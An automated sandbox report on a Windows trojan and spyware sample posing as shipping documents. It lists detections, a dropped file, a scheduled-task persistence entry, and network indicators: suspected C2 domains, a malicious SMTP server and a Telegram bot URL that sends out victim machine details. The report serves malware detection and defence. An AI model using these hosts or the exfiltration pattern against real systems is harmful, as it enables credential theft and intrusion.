Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	53%	ReversingLabs	Win32.Trojan.Genie
Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	100%	Avira	HEUR/AGEN.1310026
Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	100%	Avira	HEUR/AGEN.1310026
C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe	53%	ReversingLabs	Win32.Trojan.Genie

Source	Detection	Scanner	Label
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	phishing
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	phishing
http://varders.kozow.com:8081	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	unknown
reallyfreegeoip.org	104.21.80.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2009/01/2025%20/%2022:02:41%0D%0ACountry%20Name:%20United%20States%0D%0A[%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aborters.duckdns.org:8081	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.office.com/	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://checkip.dyndns.org/q	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024CF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4530259452.00000000024C4000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4541033239.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.00000000036E3000.00000004.00000800.00020000.00000000.sdmp, Copy shipping docs PO EV1786 LY ECO PAK EV1.exe, 00000000.00000002.4534434481.0000000003608000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586738
Start date and time:	2025-01-09 15:07:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/9@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 244 Number of non-executed functions: 105
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe

Simulations

Behavior and APIs

Time	Type	Description
09:08:01	API Interceptor	9834156x Sleep call for process: Copy shipping docs PO EV1786 LY ECO PAK EV1.exe modified
09:08:02	API Interceptor	15x Sleep call for process: powershell.exe modified
09:08:05	API Interceptor	1x Sleep call for process: SNgtfGzYQ.exe modified
15:08:04	Task Scheduler	Run new task: SNgtfGzYQ path: C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	PO.exe	Get hash	malicious	MassLogger RAT	Browse
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	spreadmalware.exe	Get hash	malicious	XWorm	Browse
	random.exe	Get hash	malicious	CStealer	Browse
208.91.199.223	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.exe	Get hash	malicious	AgentTesla	Browse
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.80.1	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
us2.smtp.mailhostbox.com	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	m30zZYga23.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	nuevo orden.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Lpjrd6Wxad.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
reallyfreegeoip.org	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
api.telegram.org	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
CLOUDFLARENETUS	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	24EPV9vjc5.exe	Get hash	malicious	Unknown	Browse	172.67.174.91
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	104.21.80.52
	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	104.21.72.124
	24EPV9vjc5.exe	Get hash	malicious	Unknown	Browse	172.67.174.91
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	104.21.80.52
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.67.174.91
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
PUBLIC-DOMAIN-REGISTRYUS	PO23100076.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	yxU3AgeVTi.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	http://www.technoafriwave.rw	Get hash	malicious	Unknown	Browse	207.174.214.183
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.115
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	208.91.198.176
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	103.53.42.63
	v4BET4inNV.vbs	Get hash	malicious	GuLoader	Browse	103.53.42.63
UTMEMUS	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	132.224.247.83
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	http://cipassoitalia.it	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	149.154.167.220
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	149.154.167.220
	s7.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220
	chrtrome22.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Purchase Order A2409002.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:lGLHyIFKL3IZ2KRH9OugQs
MD5:	D0EF8E4DD120F790DD4A5434452024B2
SHA1:	2C48DCEC4D2B6914EC9D50CFD9C252F4ACA64E86
SHA-256:	8F8FB9D5320955882AC16C0025398A4443496B123BB532D92CFA80E78BB98497
SHA-512:	B1022D646EDFDFAD447992363C54EA5D270A8EEEFD2730BE56143BBB8B24945AC65D2AFCECC7600431362773921C8809B57A6364B8FF3C640B47FDF41B6E71EA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhzanbuj.0z0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lumaheah.wdo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qx53ppw1.b3d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzdefmss.4lp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
